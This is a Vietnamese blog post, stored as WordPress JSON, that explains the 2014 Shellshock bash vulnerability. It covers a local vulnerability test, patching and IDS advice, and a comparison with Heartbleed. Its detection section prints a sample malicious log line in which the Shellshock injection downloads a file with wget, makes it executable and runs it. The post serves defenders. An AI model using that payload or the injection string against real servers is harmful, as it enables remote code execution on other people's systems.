{"id":37,"date":"2014-09-28T16:35:00","date_gmt":"2014-09-28T16:35:00","guid":{"rendered":"http:\/\/www.asianux.org.vn\/index.php\/2014\/09\/28\/nhung-dieu-can-biet-ve-lo-hong-nguy-hiem-trong-bash-cve-2014-6271\/"},"modified":"2014-09-28T16:35:00","modified_gmt":"2014-09-28T16:35:00","slug":"nhung-dieu-can-biet-ve-lo-hong-nguy-hiem-trong-bash-cve-2014-6271","status":"publish","type":"post","link":"https:\/\/www.asianux.org.vn\/index.php\/2014\/09\/28\/nhung-dieu-can-biet-ve-lo-hong-nguy-hiem-trong-bash-cve-2014-6271\/","title":{"rendered":"Nh\u1eefng \u0111i\u1ec1u c\u1ea7n bi\u1ebft v\u1ec1 l\u1ed7 h\u1ed5ng nguy hi\u1ec3m trong \u201cbash\u201d (CVE-2014-6271)"},"content":{"rendered":"<h4><span style=\"font-family: inherit;\"><span style=\"font-size: small;\">L\u1ed7 h\u1ed5ng b\u1ea3o m\u1eadt \u201cbash\u201d (CVE-2014-6271) l\u00e0 g\u00ec?<\/span><\/span><\/h4>\n<p><span style=\"font-family: inherit;\"><span style=\"font-size: small;\">L\u1ed7 h\u1ed5ng b\u1ea3o m\u1eadt \u201cbash\u201d \u0111\u01b0\u1ee3c m\u00f4 t\u1ea3 v\u1edbi m\u00e3 CVE-2014-6271 l\u00e0 m\u1ed9t l\u1ed7 h\u1ed5ng  v\u00f4 c\u00f9ng nguy hi\u1ec3m&nbsp;do c\u00f3 t\u1ea7m \u1ea3nh h\u01b0\u1edfng l\u1edbn v\u00e0 d\u1ec5 d\u00e0ng khai th\u00e1c. Tin t\u1eb7c  c\u00f3 th\u1ec3 d\u1ec5 d\u00e0ng th\u1ef1c hi\u1ec7n c\u00e1c l\u1ec7nh c\u1ee7a h\u1ec7 th\u1ed1ng c\u00f9ng quy\u1ec1n c\u1ee7a&nbsp;d\u1ecbch v\u1ee5  b\u1ecb khai th\u00e1c.<\/span><\/span><br \/><span style=\"font-family: inherit;\"><span style=\"font-size: small;\">Trong h\u1ea7u h\u1ebft c\u00e1c v\u1ee5&nbsp;b\u1ecb khai th\u00e1c b\u1edfi l\u1ed7 h\u1ed5ng&nbsp;tr\u00ean Internet hi\u1ec7n nay,  tin t\u1eb7c \u0111i\u1ec1u khi\u1ec3n c\u00e1c cu\u1ed9c t\u1ea5n c\u00f4ng v\u00e0o m\u00e1y ch\u1ee7 trang web t\u1eeb xa l\u01b0u  tr\u1eef CGI script \u0111\u01b0\u1ee3c vi\u1ebft trong bash.<\/span><\/span><br \/><span style=\"font-family: inherit;\"><span style=\"font-size: small;\">T\u1ea1i th\u1eddi \u0111i\u1ec3m c\u1ee7a b\u00e0i vi\u1ebft n\u00e0y, l\u1ed7 h\u1ed5ng \u0111\u00e3 \u0111\u01b0\u1ee3c s\u1eed d\u1ee5ng cho nh\u1eefng m\u1ee5c  \u0111\u00edch l\u1eeba \u0111\u1ea3o \u2013 l\u00e2y nhi\u1ec5m tr\u00ean c\u00e1c m\u00e1y ch\u1ee7 d\u1ec5 b\u1ecb t\u1ed5n th\u01b0\u01a1ng v\u1edbi m\u00e3  \u0111\u1ed9c&nbsp;v\u00e0 trong c\u00e1c cu\u1ed9c t\u1ea5n c\u00f4ng c\u1ee7a tin t\u1eb7c. C\u00e1c nh\u00e0 nghi\u00ean c\u1ee9u li\u00ean t\u1ee5c  thu th\u1eadp m\u1eabu m\u1edbi v\u00e0 nh\u1eefng d\u1ea5u hi\u1ec7u b\u1ecb l\u00e2y nhi\u1ec5m th\u00f4ng qua l\u1ed7 h\u1ed5ng n\u00e0y;  th\u00f4ng tin c\u1ee5 th\u1ec3 v\u1ec1 lo\u1ea1i n\u00e0y s\u1ebd \u0111\u01b0\u1ee3c c\u00f4ng b\u1ed1 s\u1edbm.<\/span><\/span><br \/><span style=\"font-family: inherit;\"><span style=\"font-size: small;\">\u0110i\u1ec1u quan tr\u1ecdng c\u1ea7n hi\u1ec3u l\u00e0 l\u1ed7 h\u1ed5ng n\u00e0y kh\u00f4ng b\u1ecb r\u1eb1ng bu\u1ed9c b\u1edfi m\u1ed9t  d\u1ecbch v\u1ee5 c\u1ee5 th\u1ec3 n\u00e0o c\u1ea3, v\u00ed d\u1ee5 Apache ho\u1eb7c nginx. Thay v\u00e0o \u0111\u00f3, n\u00f3 n\u1eb1m  trong tr\u00ecnh th\u00f4ng d\u1ecbch bash shell, cho ph\u00e9p tin t\u1eb7c th\u00eam c\u00e1c l\u1ec7nh h\u1ec7  th\u1ed1ng v\u00e0o c\u00e1c bi\u1ebfn m\u00f4i tr\u01b0\u1eddng m\u00e0 bash s\u1eed d\u1ee5ng.<\/span><\/span><\/p>\n<h4><span style=\"font-family: inherit;\"><span style=\"font-size: small;\">L\u1ed7 h\u1ed5ng \u201cbash\u201d ho\u1ea1t \u0111\u1ed9ng nh\u01b0 th\u1ebf n\u00e0o?<\/span><\/span><\/h4>\n<p><span style=\"font-family: inherit;\"><span style=\"font-size: small;\">Ch\u00fang t\u00f4i&nbsp;l\u1ea5y v\u00ed d\u1ee5 t\u01b0\u01a1ng t\u1ef1 nh\u01b0 ch\u00fang ta \u0111\u00e3 \u0111\u01b0\u1ee3c th\u1ea5y trong c\u00e1c  khuy\u1ebfn c\u00e0o v\u00e0 c\u00e1c code POC khai th\u00e1c \u0111\u01b0\u1ee3c \u0111\u0103ng t\u1ea3i nh\u1eb1m gi\u1ea3i th\u00edch c\u00e1ch  th\u1ee9c ho\u1ea1t \u0111\u1ed9ng c\u1ee7a l\u1ed7 h\u1ed5ng. Khi b\u1ea1n c\u00f3 m\u1ed9t CGI script tr\u00ean m\u00e1y ch\u1ee7 web,  scritp n\u00e0y s\u1ebd t\u1ef1 \u0111\u1ed9ng \u0111\u1ecdc c\u00e1c bi\u1ebfn m\u00f4i tr\u01b0\u1eddng nh\u1ea5t \u0111\u1ecbnh, v\u00ed d\u1ee5 nh\u01b0 \u0111\u1ecba  ch\u1ec9 IP c\u1ee7a b\u1ea1n, phi\u00ean b\u1ea3n tr\u00ecnh duy\u1ec7t web v\u00e0 th\u00f4ng tin v\u1ec1 local system.<\/span><\/span><br \/><span style=\"font-family: inherit;\"><span style=\"font-size: small;\">Nh\u01b0ng h\u00e3y t\u01b0\u1edfng t\u01b0\u1ee3ng r\u1eb1ng b\u1ea1n kh\u00f4ng ch\u1ec9 v\u01b0\u1ee3t qua \u0111\u01b0\u1ee3c th\u00f4ng tin b\u00ecnh  th\u01b0\u1eddng c\u1ee7a h\u1ec7 th\u1ed1ng v\u1edbi CGI script, b\u1ea1n c\u00f2n c\u00f3 th\u1ec3 d\u00f9ng \u0111\u1ec3 ch\u1ea1y c\u00e1c  l\u1ec7nh \u1edf c\u1ea5p \u0111\u1ed9 cao h\u01a1n c\u1ee7a h\u1ec7 th\u1ed1ng. \u0110i\u1ec1u \u0111\u00f3 c\u00f3 ngh\u0129a l\u00e0 kh\u00f4ng c\u1ea7n b\u1ea5t c\u1ee9  th\u00f4ng tin x\u00e1c th\u1ef1c n\u00e0o tr\u00ean webserver, ch\u1ec9 c\u1ea7n truy c\u1eadp v\u00e0o CGI script  b\u1ea1n c\u00f3 th\u1ec3 \u0111\u1ecdc \u0111\u01b0\u1ee3c c\u00e1c bi\u1ebfn m\u00f4i tr\u01b0\u1eddng&nbsp;n\u00e0y&nbsp;v\u00e0 nh\u1eefng bi\u1ebfn m\u00f4i tr\u01b0\u1eddng \u0111\u00f3  bao g\u1ed3m c\u1ea3 nh\u1eefng chu\u1ed7i th\u00f4ng tin c\u00f3 th\u1ec3 b\u1ecb khai th\u00e1c v\u00e0 th\u1ef1c thi l\u1ec7nh m\u00e0  b\u1ea1n ch\u1ec9 \u0111\u1ecbnh tr\u00ean m\u00e1y ch\u1ee7.<\/span><\/span><\/p>\n<h4><span style=\"font-family: inherit;\"><span style=\"font-size: small;\">\u0110i\u1ec1u khi\u1ebfn l\u1ed7 h\u1ed5ng tr\u1edf n\u00ean \u0111\u1ed9c \u0111\u00e1o v\u00e0 nguy hi\u1ec3m?<\/span><\/span><\/h4>\n<p><span style=\"font-family: inherit;\"><span style=\"font-size: small;\">L\u1ed7 h\u1ed5ng tr\u1edf n\u00ean nguy hi\u1ec3m b\u1edfi n\u00f3 r\u1ea5t d\u1ec5 d\u00e0ng khai th\u00e1c \u2013 nh\u1ea5t l\u00e0 khi  s\u1ed1 l\u01b0\u1ee3ng \u0111\u1ed1i t\u01b0\u1ee3ng \u0111ang t\u1ed3n t\u1ea1i l\u1ed7 h\u1ed5ng n\u00e0y l\u00e0 r\u1ea5t nhi\u1ec1u. N\u00f3 kh\u00f4ng ch\u1ec9  \u1ea3nh h\u01b0\u1edfng \u0111\u1ebfn m\u00e1y ch\u1ee7 web m\u00e0 c\u00f2n \u1ea3nh h\u01b0\u1edfng \u0111\u1ebfn b\u1ea5t k\u00ec ph\u1ea7n m\u1ec1m n\u00e0o s\u1eed  d\u1ee5ng th\u00f4ng d\u1ecbch bash v\u00e0 \u0111\u1ecdc c\u00e1c d\u1eef li\u1ec7u c\u1ee7a b\u1ea1n.<\/span><\/span><br \/><span style=\"font-family: inherit;\"><span style=\"font-size: small;\">C\u00e1c nh\u00e0 nghi\u00ean c\u1ee9u v\u1eabn \u0111ang c\u1ed1 g\u1eafng t\u00ecm hi\u1ec3u xem c\u00e1c tr\u00ecnh th\u00f4ng d\u1ecbch  nh\u01b0 PHP, JSP, Python hay Perl c\u00f3 b\u1ecb \u1ea3nh h\u01b0\u1edfng hay kh\u00f4ng. D\u1ef1a v\u00e0o code  \u0111\u01b0\u1ee3c vi\u1ebft, \u0111\u00f4i khi m\u1ed9t tr\u00ecnh th\u00f4ng d\u1ecbch l\u1ea1i s\u1eed d\u1ee5ng bash \u0111\u1ec3 ch\u1ea1y nh\u1eefng  h\u00e0m nh\u1ea5t \u0111inh; v\u00e0 trong tr\u01b0\u1eddng h\u1ee3p n\u00e0y r\u1ea5t c\u00f3 th\u1ec3 c\u00e1c tr\u00ecnh th\u00f4ng d\u1ecbch  kh\u00e1c c\u0169ng b\u1ecb l\u1ed7 h\u1ed5ng&nbsp;CVE-2014-6271.<\/span><\/span><br \/><span style=\"font-family: inherit;\"><span style=\"font-size: small;\">T\u00e1c \u0111\u1ed9ng c\u1ee7a n\u00f3 l\u00e0 r\u1ea5t l\u1edbn v\u00ec r\u1ea5t nhi\u1ec1u thi\u1ebft b\u1ecb nh\u00fang c\u00f3 s\u1eed d\u1ee5ng CGI  script \u2013 v\u00ed d\u1ee5 nh\u01b0 router, \u0111\u1ed3 gia d\u1ee5ng,&nbsp;wireless access point. Trong  nhi\u1ec1u tr\u01b0\u1eddng h\u1ee3p r\u1ea5t kh\u00f3 \u0111\u1ec3 v\u00e1 l\u1ed7 h\u1ed5ng n\u00e0y.<\/span><\/span><\/p>\n<h4><span style=\"font-family: inherit;\"><span style=\"font-size: small;\">M\u1ee9c \u0111\u1ed9 ph\u1ed5 bi\u1ebfn c\u1ee7a l\u1ed7 h\u1ed5ng?<\/span><\/span><\/h4>\n<p><span style=\"font-family: inherit;\"><span style=\"font-size: small;\">R\u1ea5t kh\u00f3 \u0111\u1ec3 \u0111\u01b0a ra \u0111\u01b0\u1ee3c m\u1ee9c \u0111\u1ed9 lan r\u1ed9ng c\u1ee7a n\u00f3 nh\u01b0ng theo c\u00e1c chuy\u00ean  gia t\u1eeb&nbsp;Kaspersky&nbsp;cho bi\u1ebft ngay sau khi l\u1ed7 h\u1ed5ng \u0111\u01b0\u1ee3c c\u00f4ng b\u1ed1, r\u1ea5t nhi\u1ec1u  ng\u01b0\u1eddi \u0111\u00e3 ph\u00e1t tri\u1ec3n c\u00f4ng c\u1ee5 khai th\u00e1c v\u00e0 l\u00e2y nhi\u1ec5m c\u00e1c virus li\u00ean quan \u2013  c\u1ea3 hacker m\u0169 \u0111en v\u00e0 hacker m\u0169 tr\u1eafng \u0111\u1ec1u t\u00ecm ki\u1ebfm tr\u00ean Internet nh\u1eefng  m\u00e1y ch\u1ee7 d\u1ec5 b\u1ecb t\u1ed5n th\u01b0\u01a1ng b\u1edfi l\u1ed7 h\u1ed5ng. C\u00f3 r\u1ea5t nhi\u1ec1u c\u00f4ng c\u1ee5 khai th\u00e1c  \u0111ang \u0111\u01b0\u1ee3c ph\u00e1t tri\u1ec3n nh\u1eafm \u0111\u1ebfn local file v\u00e0&nbsp;network daemon. C\u0169ng c\u00f3  nhi\u1ec1u cu\u1ed9c th\u1ea3o lu\u1eadn li\u00ean quan \u0111\u1ebfn OpenSSH v\u00e0 DHCP-Clines b\u1ecb t\u1ed5n th\u01b0\u01a1ng  tr\u01b0\u1edbc ki\u1ec3u t\u1ea5n c\u00f4ng n\u00e0y.<\/span><\/span><\/p>\n<h4><span style=\"font-family: inherit;\"><span style=\"font-size: small;\">C\u00e1ch ki\u1ec3m tra h\u1ec7 th\u1ed1ng\/trang web c\u00f3 b\u1ecb \u1ea3nh h\u01b0\u1edfng hay kh\u00f4ng?<\/span><\/span><\/h4>\n<p><span style=\"font-family: inherit;\"><span style=\"font-size: small;\">C\u00e1ch \u0111\u01a1n gi\u1ea3n nh\u1ea5t \u0111\u1ec3 ki\u1ec3m tra h\u1ec7 th\u1ed1ng c\u1ee7a b\u1ea1n c\u00f3 b\u1ecb t\u1ed5n th\u01b0\u01a1ng hay  kh\u00f4ng l\u00e0 m\u1edf m\u1ed9t&nbsp;bash-shell tr\u00ean h\u1ec7 th\u1ed1ng v\u00e0 th\u1ef1c thi l\u1ec7nh sau<\/span><\/span><\/p>\n<blockquote>\n<pre><span style=\"font-family: inherit;\"><span style=\"font-size: small;\">\"env x='() { :;}; echo vulnerable' bash&nbsp;&nbsp;-c \"<\/span><span style=\"font-size: small;\">echo <\/span><span style=\"font-size: small;\">this<\/span><span style=\"font-size: small;\"> <span>is<\/span> <span>a<\/span> <span>test<\/span>\"<\/span><\/span><\/pre>\n<\/blockquote>\n<p><span style=\"font-family: inherit;\"><span style=\"font-size: small;\">N\u1ebfu shell tr\u1ea3 v\u1ec1 chu\u1ed7i \u201cvulnerable\u201d th\u00ec b\u1ea1n n\u00ean c\u1eadp nh\u1eadt l\u1ea1i h\u1ec7 th\u1ed1ng  c\u1ee7a m\u00ecnh. Ngo\u00e0i ra c\u00f2n c\u00f3 c\u00e1c c\u00f4ng c\u1ee5 kh\u00e1c \u0111\u1ec3 ki\u1ec3m tra l\u1ed7 h\u1ed5ng n\u00e0y b\u1eb1ng  c\u00e1ch th\u1eed khai th\u00e1c v\u00e0o h\u1ec7 th\u1ed1ng c\u1ee7a b\u1ea1n.<\/span><\/span><\/p>\n<h4><span style=\"font-family: inherit;\"><span style=\"font-size: small;\">L\u1eddi khuy\u00ean v\u1ec1 vi\u1ec7c v\u00e1&nbsp;l\u1ed7 h\u1ed5ng ?<\/span><\/span><\/h4>\n<p><span style=\"font-family: inherit;\"><span style=\"font-size: small;\">Vi\u1ec7c \u0111\u1ea7u ti\u00ean m\u00e0 b\u1ea1n c\u1ea7n l\u00e0m l\u00e0 c\u1eadp nh\u1eadt phi\u00ean b\u1ea3n bash c\u1ee7a b\u1ea1n. C\u00e1c  b\u1ea3n ph\u00e2n ph\u1ed1i kh\u00e1c nhau t\u1eeb Linux \u0111\u01b0\u1ee3c cung c\u1ea5p c\u00e1c b\u1ea3n v\u00e1 l\u1ed7i cho l\u1ed7  h\u1ed5ng n\u00e0y nh\u01b0ng kh\u00f4ng ph\u1ea3i t\u1ea5t c\u1ea3 b\u1ea3n v\u00e1 \u0111\u1ec1u \u0111\u01b0\u1ee3c ch\u1ee9ng minh l\u00e0 th\u1ef1c s\u1ef1  hi\u1ec7u qu\u1ea3, \u0111\u00f3 ch\u1ec9 l\u00e0 b\u01b0\u1edbc \u0111\u1ea7u ti\u00ean c\u1ea7n l\u00e0m.<\/span><\/span><br \/><span style=\"font-family: inherit;\"><span style=\"font-size: small;\">N\u1ebfu b\u1ea1n s\u1eed d\u1ee5ng b\u1ea5t k\u00ec IDS\/IPS n\u00e0o, ch\u00fang t\u00f4i khuy\u00ean b\u1ea1n n\u00ean add\/load  m\u1ed9t signature cho n\u00f3. R\u1ea5t nhi\u1ec1u public rule \u0111\u00e3 \u0111\u01b0\u1ee3c \u0111\u0103ng t\u1ea3i. Ngo\u00e0i ra  xem x\u00e9t l\u1ea1i c\u1ea5u h\u00ecnh m\u00e1y ch\u1ee7 web c\u1ee7a b\u1ea1n. N\u1ebfu c\u00f3 b\u1ea5t k\u00ec CGI script n\u00e0o  th\u00ec h\u00e3y v\u00f4 hi\u1ec7u h\u00f3a ch\u00fang.<\/span><\/span><\/p>\n<h4><span style=\"font-family: inherit;\"><span style=\"font-size: small;\">\u0110\u00e2y c\u00f3 ph\u1ea3i l\u00e0 m\u1ed1i \u0111e d\u1ecda \u0111\u1ebfn c\u00e1c ng\u00e2n h\u00e0ng tr\u1ef1c tuy\u1ebfn?<\/span><\/span><\/h4>\n<p><span style=\"font-family: inherit;\"><span style=\"font-size: small;\">L\u1ed7 h\u1ed5ng n\u00e0y \u0111\u01b0\u1ee3c khai th\u00e1c nh\u1eafm \u0111\u1ebfn m\u1ee5c ti\u00eau l\u00e0 c\u00e1c m\u00e1y ch\u1ee7 l\u01b0u tr\u1eef  tr\u00ean Internet. Ngay c\u1ea3 m\u1ed9t s\u1ed1&nbsp;workstation ch\u1ea1y Linux v\u00e0 OSX c\u0169ng b\u1ecb \u1ea3nh  h\u01b0\u1edfng, nh\u01b0ng tin t\u1eb7c s\u1ebd c\u1ea7n p<br \/>\nh\u1ea3i t\u00ecm ra ph\u01b0\u01a1ng th\u1ee9c t\u1ea5n c\u00f4ng m\u1edbi c\u00f3 th\u1ec3  khai th\u00e1c t\u1eeb xa tr\u00ean m\u00e1y t\u00ednh c\u1ee7a b\u1ea1n.<\/span><\/span><br \/><span style=\"font-family: inherit;\"><span style=\"font-size: small;\">L\u1ed7 h\u1ed5ng n\u00e0y kh\u00f4ng nh\u1eafm \u0111\u1ebfn m\u1ee5c ti\u00eau c\u00e1 nh\u00e2n m\u00e0 l\u00e0 m\u00e1y ch\u1ee7 tr\u00ean  Internet. Nh\u01b0ng c\u0169ng&nbsp;c\u00f3 ngh\u0129a l\u00e0 n\u1ebfu trang web c\u1ee7a c\u00f4ng ty th\u01b0\u01a1ng m\u1ea1i  \u0111i\u1ec7n t\u1eed hay&nbsp;ng\u00e2n h\u00e0ng m\u00e0 b\u1ea1n s\u1eed d\u1ee5ng b\u1ecb t\u1ea5n c\u00f4ng th\u00ec v\u1ec1 m\u1eb7t l\u00ed thuy\u1ebft  th\u00f4ng tin c\u00e1 nh\u00e2n c\u1ee7a b\u1ea1n c\u0169ng s\u1ebd b\u1ecb x\u00e2m h\u1ea1i. V\u00e0o th\u1eddi \u0111i\u1ec3m c\u1ee7a b\u00e0i vi\u1ebft  n\u00e0y, kh\u00f3 c\u00f3 th\u1ec3 n\u00f3i \u0111\u01b0\u1ee3c ch\u00ednh x\u00e1c n\u1ec1n t\u1ea3ng n\u00e0o s\u1ebd b\u1ecb t\u1ed5n th\u01b0\u01a1ng v\u00e0 tr\u1edf  th\u00e0nh m\u1ee5c ti\u00eau t\u1ea5n c\u00f4ng, nh\u01b0ng ch\u00fang t\u00f4i khuy\u00ean b\u1ea1n kh\u00f4ng n\u00ean k\u00edch ho\u1ea1t  th\u1ebb t\u00edn d\u1ee5ng hay chia s\u1ebb&nbsp;nh\u1eefng th\u00f4ng tin nh\u1ea1y c\u1ea3m trong nh\u1eefng ng\u00e0y s\u1eafp  t\u1edbi, \u0111\u1ebfn khi c\u00e1c nh\u00e0 nghi\u00ean c\u1ee9u b\u1ea3o m\u1eadt c\u00f3 th\u1ec3 t\u00ecm ra nhi\u1ec1u th\u00f4ng tin  h\u01a1n v\u1ec1 t\u00ecnh hu\u1ed1ng n\u00e0y.<\/span><\/span><\/p>\n<h4><span style=\"font-family: inherit;\"><span style=\"font-size: small;\">C\u00f3 th\u1ec3 ph\u00e1t hi\u1ec7n \u0111\u01b0\u1ee3c n\u1ebfu ai \u0111\u00f3 \u0111ang khai th\u00e1c l\u1ed7 h\u1ed5ng n\u00e0y kh\u00f4ng?<\/span><\/span><\/h4>\n<p><span style=\"font-family: inherit;\"><span style=\"font-size: small;\">Ch\u00fang t\u00f4i khuy\u1ebfn c\u00e1o b\u1ea1n n\u00ean xem x\u00e9t l\u1ea1i HTTP log v\u00e0 ki\u1ec3m tra xem b\u1ea5t k\u00ec th\u1ee9 g\u00ec kh\u1ea3 nghi. V\u00ed d\u1ee5 v\u1ec1 m\u1ed9t m\u1eabu m\u00e3 \u0111\u1ed9c<\/span><\/span><\/p>\n<pre><span style=\"font-family: inherit;\"><span style=\"font-size: small;\">192.168.1.1<\/span><span style=\"font-size: small;\"> <span>-<\/span> <span>-<\/span> <span>[<\/span><span>25<\/span><span>\/<\/span><span>Sep<\/span><span>\/<\/span><span>2014<\/span><span>:<\/span><span>14<\/span><span>:<\/span><span>00<\/span><span>:<\/span><span>00<\/span> <span>+<\/span><span>0000<\/span><span>]<\/span> <span>\"GET \/ HTTP\/1.0\"<\/span><span>&nbsp;&nbsp;<\/span><span>400<\/span> <span>349<\/span> <span>\"() { :; };&nbsp;<\/span><\/span><\/span><\/pre>\n<pre><span style=\"font-family: inherit;\"><span style=\"font-size: small;\">wget -O \/tmp\/besh http:\/\/192.168.1.1\/filename; chmod 777&nbsp;&nbsp;\/tmp\/besh; \/tmp\/besh;\"<\/span><\/span><\/pre>\n<p><span style=\"font-family: inherit;\"><span style=\"font-size: small;\">Ngo\u00e0i ra c\u00f2n m\u1ed9t s\u1ed1 b\u1ea3n v\u00e1 cho bash c\u00f3 th\u1ec3 ghi l\u1ea1i d\u00f2ng l\u1ec7nh \u0111\u01b0\u1ee3c  ki\u1ec3m duy\u1ec7t th\u00f4ng qua tr\u00ecnh th\u00f4ng d\u1ecbch bash. \u0110\u00f3 l\u00e0 m\u1ed9t c\u00e1ch h\u1eefu hi\u1ec7u \u0111\u1ec3  t\u00ecm ra ai \u0111\u00f3 \u0111ang khai th\u00e1c thi\u1ebft b\u1ecb c\u1ee7a b\u1ea1n. N\u00f3 kh\u00f4ng th\u1ec3 ng\u0103n ch\u1eb7n  \u0111\u01b0\u1ee3c tin t\u1eb7c nh\u01b0ng c\u00f3 th\u1ec3 ghi ch\u00e9p l\u1ea1i ho\u1ea1t \u0111\u1ed9ng c\u1ee7a ch\u00fang tr\u00ean h\u1ec7  th\u1ed1ng.<\/span><\/span><\/p>\n<h4><span style=\"font-family: inherit;\"><span style=\"font-size: small;\">M\u1ed1i \u0111e d\u1ecda n\u00e0y nghi\u00eam tr\u1ecdng nh\u01b0 th\u1ebf n\u00e0o?<\/span><\/span><\/h4>\n<p><span style=\"font-family: inherit;\"><span style=\"font-size: small;\">L\u1ed7 h\u1ed5ng n\u00e0y th\u1ef1c s\u1ef1 nguy hi\u1ec3m, nh\u01b0ng kh\u00f4ng ph\u1ea3i m\u1ecdi h\u1ec7 th\u1ed1ng \u0111\u1ec1u b\u1ecb  t\u1ed5n th\u01b0\u01a1ng. Ph\u1ea3i trong nh\u1eefng \u0111i\u1ec1u ki\u1ec7n c\u1ee5 th\u1ec3, v\u00ed d\u1ee5 cho m\u1ed9t m\u00e1y ch\u1ee7  \u0111ang s\u1eed d\u1ee5ng c\u00e1c d\u1ecbch v\u1ee5 c\u00f3 th\u1ec3 b\u1ecb khai th\u00e1c. M\u1ed9t v\u1ea5n \u0111\u1ec1 l\u1edbn nh\u1ea5t hi\u1ec7n  nay l\u00e0 khi c\u00e1c b\u1ea3n v\u00e1 \u0111\u01b0\u1ee3c c\u00f4ng khai, c\u00e1c nh\u00e0 nghi\u00ean c\u1ee9u s\u1ebd t\u00ecm ra c\u00e1ch  \u0111\u1ec3 khai th\u00e1c bash, t\u00ecm ra nh\u1eefng \u0111i\u1ec1u ki\u1ec7n kh\u00e1c cho ph\u00e9p khai th\u00e1c bash  v.v . Nh\u1eefng b\u1ea3n v\u00e1 c\u00f3 th\u1ec3 gi\u00fap ng\u0103n ch\u1eb7n th\u1ef1c thi m\u00e3 \u0111\u1ed9c nh\u01b0ng kh\u00f4ng th\u1ec3  l\u00e0m g\u00ec \u0111\u01b0\u1ee3c v\u1edbi m\u1ed9t file ghi \u0111\u00e8 l\u00ean. V\u00ec v\u1eady c\u00f3 th\u1ec3 s\u1ebd c\u00f3 m\u1ed9t lo\u1ea1t c\u00e1c  b\u1ea3n v\u00e1 l\u1ed7i li\u00ean t\u1ee5c cho bash.<\/span><\/span><\/p>\n<h4><span style=\"font-family: inherit;\"><span style=\"font-size: small;\">\u0110\u00e2y c\u00f3 ph\u1ea3i lo\u1ea1i &nbsp;Heartbleed m\u1edbi?<\/span><\/span><\/h4>\n<p><span style=\"font-family: inherit;\"><span style=\"font-size: small;\">N\u00f3 d\u1ec5 d\u00e0ng cho tin t\u1eb7c khai th\u00e1c h\u01a1n Heartbleed. Trong tr\u01b0\u1eddng h\u1ee3p c\u1ee7a  Heartbleed, tin t\u1eb7c c\u00f3 th\u1ec3 \u0103n c\u1eafp d\u1eef li\u1ec7u t\u1eeb b\u1ed9 nh\u1edb, t\u00ecm nh\u1eefng th\u00f4ng  tin \u0111\u00e1ng quan t\u00e2m trong \u0111\u00f3. Ng\u01b0\u1ee3c l\u1ea1i, l\u1ed7 h\u1ed5ng bash c\u00f3 th\u1ec3 khi\u1ebfn tin t\u1eb7c  \u0111i\u1ec1u khi\u1ec3n to\u00e0n b\u1ed9 h\u1ec7 th\u1ed1ng. Do \u0111\u00f3 n\u00f3 c\u00f3 v\u1ebb nguy hi\u1ec3m h\u01a1n Heartbleed.<\/span><\/span><\/p>\n<h4><span style=\"font-family: inherit;\"><span style=\"font-size: small;\">N\u00f3 c\u00f3 th\u1ec3 \u0111\u01b0\u1ee3c s\u1eed d\u1ee5ng trong c\u00e1c cu\u1ed9c t\u1ea5n c\u00f4ng APT trong t\u01b0\u01a1ng lai?<\/span><\/span><\/h4>\n<p><span style=\"font-family: inherit;\"><span style=\"font-size: small;\">N\u00f3 c\u00f3 th\u1ec3 \u0111\u01b0\u1ee3c d\u00f9ng nh\u01b0 m\u1ed9t m\u00e3 \u0111\u1ed9c&nbsp;t\u1ef1 \u0111\u1ed9ng \u0111\u1ec3 ki\u1ec3m tra thi\u1ebft b\u1ecb t\u1ed3n  t\u1ea1i bug hay kh\u00f4ng, l\u00e2y lan tr\u00ean h\u1ec7 th\u1ed1ng v\u00e0 t\u1ea5n c\u00f4ng theo m\u1ed9t c\u00e1ch n\u00e0o  \u0111\u00f3.<\/span><\/span><\/p>\n<p><span style=\"font-family: inherit;\"><span style=\"font-size: small;\">The<span style=\"font-family: inherit;\">o securitydaily.net<\/span> <\/span><\/span><\/p>\n","protected":false},"excerpt":{"rendered":"<p>L\u1ed7 h\u1ed5ng b\u1ea3o m\u1eadt \u201cbash\u201d (CVE-2014-6271) l\u00e0 g\u00ec? L\u1ed7 h\u1ed5ng b\u1ea3o m\u1eadt \u201cbash\u201d \u0111\u01b0\u1ee3c m\u00f4 t\u1ea3 v\u1edbi m\u00e3 CVE-2014-6271 l\u00e0 m\u1ed9t l\u1ed7 h\u1ed5ng v\u00f4 c\u00f9ng nguy hi\u1ec3m&nbsp;do c\u00f3 t\u1ea7m \u1ea3nh h\u01b0\u1edfng l\u1edbn v\u00e0 d\u1ec5 d\u00e0ng&hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[5],"tags":[],"class_list":["post-37","post","type-post","status-publish","format-standard","hentry","category-security"],"_links":{"self":[{"href":"https:\/\/www.asianux.org.vn\/index.php\/wp-json\/wp\/v2\/posts\/37","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.asianux.org.vn\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.asianux.org.vn\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.asianux.org.vn\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.asianux.org.vn\/index.php\/wp-json\/wp\/v2\/comments?post=37"}],"version-history":[{"count":0,"href":"https:\/\/www.asianux.org.vn\/index.php\/wp-json\/wp\/v2\/posts\/37\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.asianux.org.vn\/index.php\/wp-json\/wp\/v2\/media?parent=37"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.asianux.org.vn\/index.php\/wp-json\/wp\/v2\/categories?post=37"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.asianux.org.vn\/index.php\/wp-json\/wp\/v2\/tags?post=37"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}